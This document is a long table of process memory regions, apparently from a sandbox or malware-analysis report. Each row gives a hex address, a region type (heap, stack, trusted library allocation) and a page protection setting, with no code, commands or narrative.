heap
|
page read and write
|
||
2A6E000
|
stack
|
page read and write
|
||
7FFAACF80000
|
trusted library allocation
|
page read and write
|
||
20724560000
|
heap
|
page read and write
|
||
7FFAACED9000
|
trusted library allocation
|
page read and write
|
||
18C48B1E000
|
heap
|
page read and write
|
||
207245B3000
|
heap
|
page read and write
|
||
1661C540000
|
trusted library allocation
|
page read and write
|
||
18C48B78000
|
heap
|
page read and write
|
||
18C48A2C000
|
heap
|
page read and write
|
||
7FFAACD64000
|
trusted library allocation
|
page read and write
|
||
207245A1000
|
heap
|
page read and write
|
||
18C48A30000
|
heap
|
page read and write
|
||
18C489D1000
|
heap
|
page read and write
|
||
1C438FF0000
|
trusted library allocation
|
page read and write
|
||
104E000
|
stack
|
page read and write
|
||
1C31E000
|
stack
|
page read and write
|
||
1D9257E000
|
stack
|
page read and write
|
||
F60000
|
heap
|
page read and write
|
||
207245B1000
|
heap
|
page read and write
|
||
1E8AD714000
|
trusted library allocation
|
page read and write
|
||
18C489F0000
|
heap
|
page read and write
|
||
1D9137E000
|
stack
|
page read and write
|
||
7FFAACBC0000
|
trusted library allocation
|
page read and write
|
||
18C489FC000
|
heap
|
page read and write
|
||
E7ABD3F000
|
stack
|
page read and write
|
||
7FFAACDD0000
|
trusted library allocation
|
page read and write
|
||
18C48A05000
|
heap
|
page read and write
|
||
1B1C0000
|
heap
|
page execute and read and write
|
||
12D3000
|
trusted library allocation
|
page read and write
|
||
1E89E398000
|
trusted library allocation
|
page read and write
|
||
7FFAACEA0000
|
trusted library allocation
|
page read and write
|
||
7FFAACBE0000
|
trusted library allocation
|
page read and write
|
||
18C4B237000
|
heap
|
page read and write
|
||
1C43D260000
|
trusted library allocation
|
page read and write
|
||
207245B1000
|
heap
|
page read and write
|
||
1662DF91000
|
trusted library allocation
|
page read and write
|
||
1662DFB1000
|
trusted library allocation
|
page read and write
|
||
7FFAACC60000
|
trusted library allocation
|
page read and write
|
||
2072459E000
|
heap
|
page read and write
|
||
1B69E000
|
stack
|
page read and write
|
||
18C46B3A000
|
heap
|
page read and write
|
||
12C0000
|
trusted library allocation
|
page read and write
|
||
7FFAACEB3000
|
trusted library allocation
|
page read and write
|
||
1E89B6A2000
|
heap
|
page read and write
|
||
2072259B000
|
heap
|
page read and write
|
||
207225A7000
|
heap
|
page read and write
|
||
1C438502000
|
heap
|
page read and write
|
||
18C4B222000
|
heap
|
page read and write
|
||
7FFAACEE8000
|
trusted library allocation
|
page read and write
|
||
2D27000
|
trusted library allocation
|
page read and write
|
||
7FFAACE10000
|
trusted library allocation
|
page read and write
|
||
20724592000
|
heap
|
page read and write
|
||
18C48ADB000
|
heap
|
page read and write
|
||
207245AC000
|
heap
|
page read and write
|
||
207245B6000
|
heap
|
page read and write
|
||
20724731000
|
heap
|
page read and write
|
||
2072467B000
|
heap
|
page read and write
|
||
207225C6000
|
heap
|
page read and write
|
||
B4C000
|
heap
|
page read and write
|
||
2960000
|
heap
|
page execute and read and write
|
||
2072466D000
|
heap
|
page read and write
|
||
2072467B000
|
heap
|
page read and write
|
||
1661C36A000
|
heap
|
page read and write
|
||
19F14FA000
|
stack
|
page read and write
|
||
18C48B97000
|
heap
|
page read and write
|
||
207245BA000
|
heap
|
page read and write
|
||
18C489FC000
|
heap
|
page read and write
|
||
C80000
|
heap
|
page read and write
|
||
207225B2000
|
heap
|
page read and write
|
||
C8B000
|
heap
|
page read and write
|
||
17AF5430000
|
heap
|
page read and write
|
||
18C48A1C000
|
heap
|
page read and write
|
||
1CCA7000
|
heap
|
page read and write
|
||
207245A6000
|
heap
|
page read and write
|
||
7FFAACDE0000
|
trusted library allocation
|
page read and write
|
||
2249CEC0000
|
trusted library allocation
|
page read and write
|
||
2249E37C000
|
trusted library allocation
|
page read and write
|
||
18C46B5E000
|
heap
|
page read and write
|
||
18C48A24000
|
heap
|
page read and write
|
||
18C48A05000
|
heap
|
page read and write
|
||
1C438400000
|
heap
|
page read and write
|
||
18C48A1C000
|
heap
|
page read and write
|
||
7FFAACE10000
|
trusted library allocation
|
page read and write
|
||
224B5650000
|
heap
|
page read and write
|
||
2249CF40000
|
trusted library allocation
|
page read and write
|
||
18C48A20000
|
heap
|
page read and write
|
||
207245C2000
|
heap
|
page read and write
|
||
7FFAACD22000
|
trusted library allocation
|
page read and write
|
||
207225E8000
|
heap
|
page read and write
|
||
1C437CB1000
|
heap
|
page read and write
|
||
207245BF000
|
heap
|
page read and write
|
||
20724575000
|
heap
|
page read and write
|
||
2072459B000
|
heap
|
page read and write
|
||
B4A000
|
heap
|
page read and write
|
||
1C437CA1000
|
heap
|
page read and write
|
||
224B58EB000
|
heap
|
page read and write
|
||
224B5580000
|
heap
|
page read and write
|
||
7FFAACFD0000
|
trusted library allocation
|
page read and write
|
||
207245BA000
|
heap
|
page read and write
|
||
207245B2000
|
heap
|
page read and write
|
||
7FFAACF19000
|
trusted library allocation
|
page read and write
|
||
207245C8000
|
heap
|
page read and write
|
||
18C48A2C000
|
heap
|
page read and write
|
||
18C46AF3000
|
heap
|
page read and write
|
||
207245AC000
|
heap
|
page read and write
|
||
7FFAACD3A000
|
trusted library allocation
|
page read and write
|
||
224AD061000
|
trusted library allocation
|
page read and write
|
||
1661C370000
|
heap
|
page read and write
|
||
166366F8000
|
heap
|
page read and write
|
||
18C48A28000
|
heap
|
page read and write
|
||
18C48A18000
|
heap
|
page read and write
|
||
2249B660000
|
heap
|
page read and write
|
||
17AF77DB000
|
heap
|
page read and write
|
||
18C48A30000
|
heap
|
page read and write
|
||
7FFAACF70000
|
trusted library allocation
|
page read and write
|
||
17AF551C000
|
heap
|
page read and write
|
||
7FFAACC30000
|
trusted library allocation
|
page read and write
|
||
7FFAACBCD000
|
trusted library allocation
|
page execute and read and write
|
||
2249E15D000
|
trusted library allocation
|
page read and write
|
||
2072457B000
|
heap
|
page read and write
|
||
18C48A13000
|
heap
|
page read and write
|
||
18C48AF5000
|
heap
|
page read and write
|
||
18C489EF000
|
heap
|
page read and write
|
||
207245A6000
|
heap
|
page read and write
|
||
7FFAACB90000
|
trusted library allocation
|
page read and write
|
||
20724587000
|
heap
|
page read and write
|
||
18C48A36000
|
heap
|
page read and write
|
||
18C46B06000
|
heap
|
page read and write
|
||
207246C8000
|
heap
|
page read and write
|
||
17AF54FC000
|
heap
|
page read and write
|
||
18C46AD5000
|
heap
|
page read and write
|
||
1661EF96000
|
trusted library allocation
|
page read and write
|
||
20724682000
|
heap
|
page read and write
|
||
17A90001000
|
trusted library allocation
|
page read and write
|
||
2072458B000
|
heap
|
page read and write
|
||
1661DF91000
|
trusted library allocation
|
page read and write
|
||
20723FD0000
|
heap
|
page read and write
|
||
7FFAACC46000
|
trusted library allocation
|
page read and write
|
||
1843EEB0000
|
heap
|
page read and write
|
||
7FFAACE30000
|
trusted library allocation
|
page read and write
|
||
18C48A30000
|
heap
|
page read and write
|
||
1C437CC5000
|
heap
|
page read and write
|
||
207225B8000
|
heap
|
page read and write
|
||
1B24C000
|
stack
|
page read and write
|
||
7FFAAD030000
|
trusted library allocation
|
page read and write
|
||
7DF462D00000
|
trusted library allocation
|
page execute and read and write
|
||
18C46A60000
|
heap
|
page read and write
|
||
7FFAACB80000
|
trusted library allocation
|
page read and write
|
||
18C48AF3000
|
heap
|
page read and write
|
||
16636560000
|
heap
|
page execute and read and write
|
||
20724596000
|
heap
|
page read and write
|
||
207245B1000
|
heap
|
page read and write
|
||
1E89D649000
|
trusted library allocation
|
page read and write
|
||
207245AC000
|
heap
|
page read and write
|
||
E7ACB0C000
|
stack
|
page read and write
|
||
18C46A70000
|
heap
|
page read and write
|
||
18C489D7000
|
heap
|
page read and write
|
||
7FFAACF7A000
|
trusted library allocation
|
page read and write
|
||
7FFAACEE5000
|
trusted library allocation
|
page read and write
|
||
17A80C11000
|
trusted library allocation
|
page read and write
|
||
18C4B22D000
|
heap
|
page read and write
|
||
1661C43D000
|
heap
|
page read and write
|
||
7FFAACE70000
|
trusted library allocation
|
page read and write
|
||
1D913FE000
|
unkown
|
page readonly
|
||
17A80A52000
|
trusted library allocation
|
page read and write
|
||
48A28B9000
|
stack
|
page read and write
|
||
BD1000
|
stack
|
page read and write
|
||
7FFAACEB0000
|
trusted library allocation
|
page read and write
|
||
4148B7E000
|
stack
|
page read and write
|
||
207245B6000
|
heap
|
page read and write
|
||
7FFAACEEC000
|
trusted library allocation
|
page read and write
|
||
7FFAAD040000
|
trusted library allocation
|
page read and write
|
||
1C438402000
|
heap
|
page read and write
|
||
207245C2000
|
heap
|
page read and write
|
||
1E89E394000
|
trusted library allocation
|
page read and write
|
||
207245BB000
|
heap
|
page read and write
|
||
1662E299000
|
trusted library allocation
|
page read and write
|
||
18C4B226000
|
heap
|
page read and write
|
||
18C48A2C000
|
heap
|
page read and write
|
||
18C46B2D000
|
heap
|
page read and write
|
||
1661E1B9000
|
trusted library allocation
|
page read and write
|
||
41490FF000
|
stack
|
page read and write
|
||
18C48A24000
|
heap
|
page read and write
|
||
7FFAACE00000
|
trusted library allocation
|
page read and write
|
||
7DF43C4C0000
|
trusted library allocation
|
page execute and read and write
|
||
1E89D2B0000
|
heap
|
page read and write
|
||
18C48B2C000
|
heap
|
page read and write
|
||
7FFAACB9B000
|
trusted library allocation
|
page read and write
|
||
20724583000
|
heap
|
page read and write
|
||
18C48A13000
|
heap
|
page read and write
|
||
18C46B1B000
|
heap
|
page read and write
|
||
166365F0000
|
heap
|
page read and write
|
||
224B55D1000
|
heap
|
page read and write
|
||
1E89B880000
|
heap
|
page read and write
|
||
7FFAACD70000
|
trusted library allocation
|
page execute and read and write
|
||
17AF71A5000
|
heap
|
page read and write
|
||
2249EE67000
|
trusted library allocation
|
page read and write
|
||
2249E24E000
|
trusted library allocation
|
page read and write
|
||
207245A2000
|
heap
|
page read and write
|
||
3E2D57E000
|
stack
|
page read and write
|
||
207245B2000
|
heap
|
page read and write
|
||
2072459B000
|
heap
|
page read and write
|
||
1661EFF6000
|
trusted library allocation
|
page read and write
|
||
7FFAACFE6000
|
trusted library allocation
|
page read and write
|
||
1E89B850000
|
heap
|
page read and write
|
||
18C46B0A000
|
heap
|
page read and write
|
||
F4E000
|
heap
|
page read and write
|
||
7FFAACFB0000
|
trusted library allocation
|
page execute and read and write
|
||
207245AC000
|
heap
|
page read and write
|
||
19F10FE000
|
stack
|
page read and write
|
||
166366A4000
|
heap
|
page read and write
|
||
18C48A18000
|
heap
|
page read and write
|
||
7FFAACF14000
|
trusted library allocation
|
page read and write
|
||
7FFAACFCC000
|
trusted library allocation
|
page read and write
|
||
18C489EF000
|
heap
|
page read and write
|
||
20724731000
|
heap
|
page read and write
|
||
7FFAACFD6000
|
trusted library allocation
|
page read and write
|
||
18C48A20000
|
heap
|
page read and write
|
||
1C437A70000
|
heap
|
page read and write
|
||
1C43D380000
|
trusted library allocation
|
page read and write
|
||
18C48A0B000
|
heap
|
page read and write
|
||
207245C6000
|
heap
|
page read and write
|
||
41487B3000
|
stack
|
page read and write
|
||
19F2247000
|
stack
|
page read and write
|
||
1E89D421000
|
trusted library allocation
|
page read and write
|
||
207245B1000
|
heap
|
page read and write
|
||
1661F8E2000
|
trusted library allocation
|
page read and write
|
||
18C46AF3000
|
heap
|
page read and write
|
||
207245AC000
|
heap
|
page read and write
|
||
224AD33B000
|
trusted library allocation
|
page read and write
|
||
1D925FE000
|
unkown
|
page readonly
|
||
18C46B4D000
|
heap
|
page read and write
|
||
207245AC000
|
heap
|
page read and write
|
||
20724682000
|
heap
|
page read and write
|
||
224AD32D000
|
trusted library allocation
|
page read and write
|
||
18C48A20000
|
heap
|
page read and write
|
||
7FFAACE80000
|
trusted library allocation
|
page read and write
|
||
2249DC46000
|
trusted library allocation
|
page read and write
|
||
20724678000
|
heap
|
page read and write
|
||
18C48A0E000
|
heap
|
page read and write
|
||
18C48BA3000
|
heap
|
page read and write
|
||
33223CF000
|
stack
|
page read and write
|
||
1D922FE000
|
unkown
|
page readonly
|
||
18C48A01000
|
heap
|
page read and write
|
||
18C46AF6000
|
heap
|
page read and write
|
||
18C48A12000
|
heap
|
page read and write
|
||
1C437C2B000
|
heap
|
page read and write
|
||
224B5550000
|
heap
|
page read and write
|
||
18C46AEF000
|
heap
|
page read and write
|
||
7FFAACE41000
|
trusted library allocation
|
page read and write
|
||
E7AC98E000
|
stack
|
page read and write
|
||
207225E8000
|
heap
|
page read and write
|
||
1C43D230000
|
trusted library allocation
|
page read and write
|
||
1E8B5AA8000
|
heap
|
page read and write
|
||
7FFAACD30000
|
trusted library allocation
|
page read and write
|
||
3322C7B000
|
stack
|
page read and write
|
||
1C437C83000
|
heap
|
page read and write
|
||
7FFAACD70000
|
trusted library allocation
|
page execute and read and write
|
||
4149CC9000
|
stack
|
page read and write
|
||
7FFAACBA0000
|
trusted library allocation
|
page read and write
|
||
17AF54D3000
|
heap
|
page read and write
|
||
207245A1000
|
heap
|
page read and write
|
||
17A902ED000
|
trusted library allocation
|
page read and write
|
||
1C439102000
|
heap
|
page read and write
|
||
7FFAACBDC000
|
trusted library allocation
|
page execute and read and write
|
||
2072459E000
|
heap
|
page read and write
|
||
7FFAACF28000
|
trusted library allocation
|
page read and write
|
||
E8F000
|
stack
|
page read and write
|
||
7FFAACB8D000
|
trusted library allocation
|
page execute and read and write
|
||
20724670000
|
heap
|
page read and write
|
||
1B5CF000
|
stack
|
page read and write
|
||
1E89F244000
|
trusted library allocation
|
page read and write
|
||
207246F8000
|
heap
|
page read and write
|
||
7FFAACE20000
|
trusted library allocation
|
page read and write
|
||
18C46B04000
|
heap
|
page read and write
|
||
2249D035000
|
heap
|
page read and write
|
||
207245B7000
|
heap
|
page read and write
|
||
1E8B5A0D000
|
heap
|
page read and write
|
||
7FFAACDA2000
|
trusted library allocation
|
page read and write
|
||
1B89E000
|
stack
|
page read and write
|
||
18C48A12000
|
heap
|
page read and write
|
||
207246DB000
|
heap
|
page read and write
|
||
207245C2000
|
heap
|
page read and write
|
||
1E89E138000
|
trusted library allocation
|
page read and write
|
||
207245A1000
|
heap
|
page read and write
|
||
207245AC000
|
heap
|
page read and write
|
||
7FFAACE70000
|
trusted library allocation
|
page read and write
|
||
2072457E000
|
heap
|
page read and write
|
||
18C46B20000
|
heap
|
page read and write
|
||
1E89B9D0000
|
heap
|
page read and write
|
||
7FFAACC3C000
|
trusted library allocation
|
page execute and read and write
|
||
18C48AF3000
|
heap
|
page read and write
|
||
207225C8000
|
heap
|
page read and write
|
||
18C48A05000
|
heap
|
page read and write
|
||
1BBA0000
|
heap
|
page read and write
|
||
25ED87E000
|
stack
|
page read and write
|
||
207245A1000
|
heap
|
page read and write
|
||
18C48A28000
|
heap
|
page read and write
|
||
17A8130C000
|
trusted library allocation
|
page read and write
|
||
20724569000
|
heap
|
page read and write
|
||
1661F050000
|
trusted library allocation
|
page read and write
|
||
17A81036000
|
trusted library allocation
|
page read and write
|
||
18C48A05000
|
heap
|
page read and write
|
||
7FFAACCA0000
|
trusted library allocation
|
page execute and read and write
|
||
1C43D300000
|
trusted library allocation
|
page read and write
|
||
7FFAACFA0000
|
trusted library allocation
|
page read and write
|
||
7FFB1E3C2000
|
unkown
|
page readonly
|
||
1661F7FA000
|
trusted library allocation
|
page read and write
|
||
332364E000
|
stack
|
page read and write
|
||
18C48A21000
|
heap
|
page read and write
|
||
20722581000
|
heap
|
page read and write
|
||
7FFAACC40000
|
trusted library allocation
|
page read and write
|
||
207245C2000
|
heap
|
page read and write
|
||
207245BA000
|
heap
|
page read and write
|
||
1E89ED14000
|
trusted library allocation
|
page read and write
|
||
18C48A12000
|
heap
|
page read and write
|
||
18C489EA000
|
heap
|
page read and write
|
||
1E89D8EE000
|
trusted library allocation
|
page read and write
|
||
166366A0000
|
heap
|
page read and write
|
||
207245B1000
|
heap
|
page read and write
|
||
7FFAACD64000
|
trusted library allocation
|
page read and write
|
||
7FFAACED0000
|
trusted library allocation
|
page read and write
|
||
7FFAACED4000
|
trusted library allocation
|
page read and write
|
||
7FFAACFD0000
|
trusted library allocation
|
page read and write
|
||
7FFAACEE5000
|
trusted library allocation
|
page read and write
|
||
1C438FB0000
|
trusted library allocation
|
page read and write
|
||
1663666B000
|
heap
|
page read and write
|
||
19F214E000
|
stack
|
page read and write
|
||
E7AB57D000
|
stack
|
page read and write
|
||
18C48B9E000
|
heap
|
page read and write
|
||
18C489D2000
|
heap
|
page read and write
|
||
17AF54C7000
|
heap
|
page read and write
|
||
7FFAACFC0000
|
trusted library allocation
|
page read and write
|
||
7FFB1E3A1000
|
unkown
|
page execute read
|
||
414917B000
|
stack
|
page read and write
|
||
1E8AD421000
|
trusted library allocation
|
page read and write
|
||
18C46B03000
|
heap
|
page read and write
|
||
207245B1000
|
heap
|
page read and write
|
||
1662E243000
|
trusted library allocation
|
page read and write
|
||
20724562000
|
heap
|
page read and write
|
||
18C46B37000
|
heap
|
page read and write
|
||
19F177B000
|
stack
|
page read and write
|
||
17A80F72000
|
trusted library allocation
|
page read and write
|
||
17A90031000
|
trusted library allocation
|
page read and write
|
||
18C4B20C000
|
heap
|
page read and write
|
||
207225B9000
|
heap
|
page read and write
|
||
18C48A20000
|
heap
|
page read and write
|
||
207245C2000
|
heap
|
page read and write
|
||
2072457E000
|
heap
|
page read and write
|
||
1D921FE000
|
unkown
|
page readonly
|
||
18C48A00000
|
heap
|
page read and write
|
||
18C48B65000
|
heap
|
page read and write
|
||
1D9147E000
|
stack
|
page read and write
|
||
12A73000
|
trusted library allocation
|
page read and write
|
||
286F000
|
stack
|
page read and write
|
||
1E8B5ADC000
|
heap
|
page read and write
|
||
18C489EF000
|
heap
|
page read and write
|
||
20724583000
|
heap
|
page read and write
|
||
7FFAACC66000
|
trusted library allocation
|
page execute and read and write
|
||
17AF54C0000
|
heap
|
page read and write
|
||
E7AB87E000
|
stack
|
page read and write
|
||
1D9247E000
|
stack
|
page read and write
|
||
224B588A000
|
heap
|
page read and write
|
||
7FFAACB9D000
|
trusted library allocation
|
page execute and read and write
|
||
18C46B23000
|
heap
|
page read and write
|
||
20722587000
|
heap
|
page read and write
|
||
F40000
|
heap
|
page read and write
|
||
207245A6000
|
heap
|
page read and write
|
||
19F0D3E000
|
stack
|
page read and write
|
||
17AF79D0000
|
heap
|
page read and write
|
||
1C437CCD000
|
heap
|
page read and write
|
||
20728BA3000
|
heap
|
page read and write
|
||
1D9177E000
|
stack
|
page read and write
|
||
1C4383D1000
|
trusted library allocation
|
page read and write
|
||
7FFAACC70000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAACEE2000
|
trusted library allocation
|
page read and write
|
||
16636590000
|
heap
|
page read and write
|
||
1E8B58A8000
|
heap
|
page read and write
|
||
20724650000
|
heap
|
page read and write
|
||
19F0DBE000
|
stack
|
page read and write
|
||
18C48B77000
|
heap
|
page read and write
|
||
20722564000
|
heap
|
page read and write
|
||
1C438940000
|
trusted library allocation
|
page read and write
|
||
19F234E000
|
stack
|
page read and write
|
||
17AF6F30000
|
heap
|
page execute and read and write
|
||
7FFAACE60000
|
trusted library allocation
|
page read and write
|
||
207245B2000
|
heap
|
page read and write
|
||
7FFAACF30000
|
trusted library allocation
|
page read and write
|
||
332374E000
|
stack
|
page read and write
|
||
207246F2000
|
heap
|
page read and write
|
||
18C489E4000
|
heap
|
page read and write
|
||
7FFAACC30000
|
trusted library allocation
|
page read and write
|
||
7FFB23AF6000
|
unkown
|
page readonly
|
||
7FFAACBC0000
|
trusted library allocation
|
page read and write
|
||
207245A1000
|
heap
|
page read and write
|
||
17A81E02000
|
trusted library allocation
|
page read and write
|
||
2560000
|
trusted library allocation
|
page read and write
|
||
1E8B5AE1000
|
heap
|
page read and write
|
||
7FFAACB8D000
|
trusted library allocation
|
page execute and read and write
|
||
3322283000
|
stack
|
page read and write
|
||
18C489FF000
|
heap
|
page read and write
|
||
224AD3B4000
|
trusted library allocation
|
page read and write
|
||
207245A1000
|
heap
|
page read and write
|
||
207245B2000
|
heap
|
page read and write
|
||
20724596000
|
heap
|
page read and write
|
||
207245C6000
|
heap
|
page read and write
|
||
17A90021000
|
trusted library allocation
|
page read and write
|
||
7FFAACD31000
|
trusted library allocation
|
page read and write
|
||
2249CF00000
|
heap
|
page execute and read and write
|
||
17AF5480000
|
heap
|
page read and write
|
||
18C48A05000
|
heap
|
page read and write
|
||
7FFAACEB0000
|
trusted library allocation
|
page read and write
|
||
18C48A28000
|
heap
|
page read and write
|
||
18C48B9A000
|
heap
|
page read and write
|
||
1C4390E9000
|
heap
|
page read and write
|
||
1E8AD496000
|
trusted library allocation
|
page read and write
|
||
3E2D8FE000
|
stack
|
page read and write
|
||
207245BE000
|
heap
|
page read and write
|
||
2072258F000
|
heap
|
page read and write
|
||
2249B5E8000
|
heap
|
page read and write
|
||
18C48A1C000
|
heap
|
page read and write
|
||
A80000
|
unkown
|
page readonly
|
||
20722500000
|
heap
|
page read and write
|
||
7FFAACDE0000
|
trusted library allocation
|
page read and write
|
||
18C48A0F000
|
heap
|
page read and write
|
||
20722582000
|
heap
|
page read and write
|
||
18C46B32000
|
heap
|
page read and write
|
||
7FFAACC50000
|
trusted library allocation
|
page execute and read and write
|
||
F00000
|
heap
|
page read and write
|
||
18C48A0B000
|
heap
|
page read and write
|
||
7FFAACE65000
|
trusted library allocation
|
page read and write
|
||
224B5540000
|
heap
|
page execute and read and write
|
||
18C489EA000
|
heap
|
page read and write
|
||
17A80F87000
|
trusted library allocation
|
page read and write
|
||
1C437C41000
|
heap
|
page read and write
|
||
7FFAACDC0000
|
trusted library allocation
|
page read and write
|
||
C20000
|
heap
|
page read and write
|
||
E20000
|
heap
|
page read and write
|
||
7FFB23B00000
|
unkown
|
page read and write
|
||
207245C6000
|
heap
|
page read and write
|
||
1C43D220000
|
trusted library allocation
|
page read and write
|
||
18C48A28000
|
heap
|
page read and write
|
||
18C48A24000
|
heap
|
page read and write
|
||
7FFAACED4000
|
trusted library allocation
|
page read and write
|
||
7FFAACEE2000
|
trusted library allocation
|
page read and write
|
||
7FFAACED9000
|
trusted library allocation
|
page read and write
|
||
207245B2000
|
heap
|
page read and write
|
||
7FFAACDD0000
|
trusted library allocation
|
page read and write
|
||
18C48A05000
|
heap
|
page read and write
|
||
7FFAACE80000
|
trusted library allocation
|
page read and write
|
||
2072259B000
|
heap
|
page read and write
|
||
18C48A18000
|
heap
|
page read and write
|
||
207245A6000
|
heap
|
page read and write
|
||
17AF7750000
|
heap
|
page read and write
|
||
BE5000
|
heap
|
page read and write
|
||
1662E280000
|
trusted library allocation
|
page read and write
|
||
1661FDB9000
|
trusted library allocation
|
page read and write
|
||
18C46B0C000
|
heap
|
page read and write
|
||
1661C2E0000
|
heap
|
page read and write
|
||
18C48A0B000
|
heap
|
page read and write
|
||
2072473D000
|
heap
|
page read and write
|
||
224AD071000
|
trusted library allocation
|
page read and write
|
||
2CBE000
|
stack
|
page read and write
|
||
7FFAACFF0000
|
trusted library allocation
|
page execute and read and write
|
||
207225D8000
|
heap
|
page read and write
|
||
20724676000
|
heap
|
page read and write
|
||
207246DB000
|
heap
|
page read and write
|
||
18C48A1D000
|
heap
|
page read and write
|
||
7FFAACFA0000
|
trusted library allocation
|
page read and write
|
||
1C437A50000
|
heap
|
page read and write
|
||
2249D041000
|
trusted library allocation
|
page read and write
|
||
1C43D231000
|
trusted library allocation
|
page read and write
|
||
18C48A28000
|
heap
|
page read and write
|
||
3E2D67E000
|
stack
|
page read and write
|
||
1C43D230000
|
trusted library allocation
|
page read and write
|
||
18C489D2000
|
heap
|
page read and write
|
||
18C48A05000
|
heap
|
page read and write
|
||
7FFAACF22000
|
trusted library allocation
|
page read and write
|
||
18C48BA0000
|
heap
|
page read and write
|
||
18C46B09000
|
heap
|
page read and write
|
||
1E8B5880000
|
heap
|
page read and write
|
||
18C48B25000
|
heap
|
page read and write
|
||
1B2CE000
|
stack
|
page read and write
|
||
19F15FE000
|
stack
|
page read and write
|
||
1E8B5A66000
|
heap
|
page read and write
|
||
20724674000
|
heap
|
page read and write
|
||
207245BB000
|
heap
|
page read and write
|
||
E7AB5FF000
|
stack
|
page read and write
|
||
207245C4000
|
heap
|
page read and write
|
||
7FFAACEE8000
|
trusted library allocation
|
page read and write
|
||
7FFB1E3C5000
|
unkown
|
page readonly
|
||
17A80228000
|
trusted library allocation
|
page read and write
|
||
1661EB89000
|
trusted library allocation
|
page read and write
|
||
1C437C8C000
|
heap
|
page read and write
|
||
7FFAACD60000
|
trusted library allocation
|
page read and write
|
||
7FFAACF10000
|
trusted library allocation
|
page read and write
|
||
2249E8CF000
|
trusted library allocation
|
page read and write
|
||
1E89B980000
|
trusted library allocation
|
page read and write
|
||
2249E3C7000
|
trusted library allocation
|
page read and write
|
||
19F167C000
|
stack
|
page read and write
|
||
1D91FFE000
|
unkown
|
page readonly
|
||
E7AB4F3000
|
stack
|
page read and write
|
||
207245BB000
|
heap
|
page read and write
|
||
2760000
|
heap
|
page read and write
|
||
7FFAACC76000
|
trusted library allocation
|
page read and write
|
||
1661F355000
|
trusted library allocation
|
page read and write
|
||
18C489FD000
|
heap
|
page read and write
|
||
18C48A20000
|
heap
|
page read and write
|
||
D90000
|
heap
|
page read and write
|
||
2249B59E000
|
heap
|
page read and write
|
||
17AF7142000
|
heap
|
page read and write
|
||
1C43D274000
|
trusted library allocation
|
page read and write
|
||
16636337000
|
heap
|
page read and write
|
||
1D9307E000
|
stack
|
page read and write
|
||
224AD34B000
|
trusted library allocation
|
page read and write
|
||
1C43D270000
|
trusted library allocation
|
page read and write
|
||
224B57CB000
|
heap
|
page read and write
|
||
1661C320000
|
heap
|
page read and write
|
||
E7AB97E000
|
stack
|
page read and write
|
||
7FFAACBC4000
|
trusted library allocation
|
page read and write
|
||
BA0000
|
heap
|
page read and write
|
||
18C46AFB000
|
heap
|
page read and write
|
||
7FFAACFC0000
|
trusted library allocation
|
page read and write
|
||
18C48A1C000
|
heap
|
page read and write
|
||
7FFAACDB0000
|
trusted library allocation
|
page read and write
|
||
18C48A05000
|
heap
|
page read and write
|
||
207246F0000
|
heap
|
page read and write
|
||
1C43D310000
|
trusted library allocation
|
page read and write
|
||
1D915F7000
|
stack
|
page read and write
|
||
1CC70000
|
heap
|
page read and write
|
||
17A80087000
|
trusted library allocation
|
page read and write
|
||
18C46AFB000
|
heap
|
page read and write
|
||
207245BE000
|
heap
|
page read and write
|
||
BF7000
|
heap
|
page read and write
|
||
7FFAACBA3000
|
trusted library allocation
|
page read and write
|
||
18C489FC000
|
heap
|
page read and write
|
||
7FFAACB83000
|
trusted library allocation
|
page execute and read and write
|
||
1B6F0000
|
heap
|
page read and write
|
||
19F234C000
|
stack
|
page read and write
|
||
1C438415000
|
heap
|
page read and write
|
||
2072257D000
|
heap
|
page read and write
|
||
18C48A08000
|
heap
|
page read and write
|
||
18C48B77000
|
heap
|
page read and write
|
||
207225A2000
|
heap
|
page read and write
|
||
1020000
|
heap
|
page read and write
|
||
18C489F8000
|
heap
|
page read and write
|
||
20722587000
|
heap
|
page read and write
|
||
7FFAACE30000
|
trusted library allocation
|
page read and write
|
||
18C4B221000
|
heap
|
page read and write
|
||
1E89E390000
|
trusted library allocation
|
page read and write
|
||
7FFAACE70000
|
trusted library allocation
|
page read and write
|
||
3E2D9FB000
|
stack
|
page read and write
|
||
1BF0F000
|
stack
|
page read and write
|
||
19F117A000
|
stack
|
page read and write
|
||
18C489F2000
|
heap
|
page read and write
|
||
1D91BFE000
|
unkown
|
page readonly
|
||
7FFAACBA0000
|
trusted library allocation
|
page read and write
|
||
166365CF000
|
heap
|
page read and write
|
||
207226E0000
|
heap
|
page read and write
|
||
17A902FA000
|
trusted library allocation
|
page read and write
|
||
18C48B87000
|
heap
|
page read and write
|
||
224B5878000
|
heap
|
page read and write
|
||
7FFAACD62000
|
trusted library allocation
|
page read and write
|
||
1B049000
|
heap
|
page read and write
|
||
207245A6000
|
heap
|
page read and write
|
||
7FFAACB9B000
|
trusted library allocation
|
page read and write
|
||
20724731000
|
heap
|
page read and write
|
||
1663669C000
|
heap
|
page read and write
|
||
7FFAACD50000
|
trusted library allocation
|
page read and write
|
||
18C46AEF000
|
heap
|
page read and write
|
||
1661C650000
|
heap
|
page execute and read and write
|
||
33228F9000
|
stack
|
page read and write
|
||
17AF721E000
|
heap
|
page read and write
|
||
1661F139000
|
trusted library allocation
|
page read and write
|
||
7FFAACC40000
|
trusted library allocation
|
page execute and read and write
|
||
7FFB1E3A0000
|
unkown
|
page readonly
|
||
B90000
|
heap
|
page read and write
|
||
18C48A18000
|
heap
|
page read and write
|
||
2072459B000
|
heap
|
page read and write
|
||
7FFAACF10000
|
trusted library allocation
|
page read and write
|
||
16636721000
|
heap
|
page read and write
|
||
18C48A0E000
|
heap
|
page read and write
|
||
18C489EF000
|
heap
|
page read and write
|
||
18C48B37000
|
heap
|
page read and write
|
||
18C48A0B000
|
heap
|
page read and write
|
||
17A90074000
|
trusted library allocation
|
page read and write
|
||
207245AC000
|
heap
|
page read and write
|
||
7FFAACF00000
|
trusted library allocation
|
page read and write
|
||
18C48A06000
|
heap
|
page read and write
|
||
18C48A30000
|
heap
|
page read and write
|
||
7FFAACB90000
|
trusted library allocation
|
page read and write
|
||
207245BE000
|
heap
|
page read and write
|
||
207245A6000
|
heap
|
page read and write
|
||
18C46B23000
|
heap
|
page read and write
|
||
207246F0000
|
heap
|
page read and write
|
||
7FFAACE30000
|
trusted library allocation
|
page read and write
|
||
18C48A2C000
|
heap
|
page read and write
|
||
25ED6FE000
|
stack
|
page read and write
|
||
1D92AFE000
|
unkown
|
page readonly
|
||
2249CEB0000
|
heap
|
page readonly
|
||
17A81829000
|
trusted library allocation
|
page read and write
|
||
18C4B22E000
|
heap
|
page read and write
|
||
